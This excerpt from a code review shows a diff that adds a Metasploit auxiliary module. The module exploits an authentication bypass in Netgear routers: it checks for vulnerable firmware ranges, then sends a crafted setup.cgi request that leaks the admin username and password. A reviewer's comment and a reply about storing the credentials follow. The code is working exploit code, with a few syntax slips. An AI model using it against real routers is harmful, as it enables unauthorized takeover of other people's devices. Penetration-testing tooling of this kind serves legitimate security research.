modules/auxiliary/admin/http/netgear_PNPX_GetShareFolderList_auth_bypass.rb

```diff
@@ -0,0 +1,127 @@
+      firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
+      if firmware_version.nil?
+        return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
+      end
+
+      firmware_version
+    end
+
+    def check
+      target_version = retrieve_version
+      print_status("Target is running firmware version #{target_version}")
+      if (target_version >= Rex::Version.new('1.2.0.0')) && (target_version < Rex::Version.new('1.2.0.88'))
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.0.1.0')) && (target_version < Rex::Version.new('1.0.1.80'))
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
+        return Exploit::CheckCode::Appears
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+
+    def run
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET'
+      })
+      unless res.headers['WWW-Authenticate'] =~ /Netgear/:
+        fail_with(Failure::NoTarget, 'Target does not appear to be a Netgear router!')
+      end
+
+      res = send_request_cgi({
+        'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList'
+        'method' => 'GET'
+      })
+
+      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
+        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
+      end
+      username = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
+
+      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
+        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin password in its response!')
+      end
+      password = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
+
+      if username.empty? || password.empty?
+        fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
+      end
+
+      print_good("Can log into target router using username #{username} and password #{password}")
```

Comment:
Can you store these creds in the database?

Reply:
Fixed in https://github.com/gwillcox-r7/metasploit-framework/commit/f9c683132c9dd0124981c331888a3511a1e39b05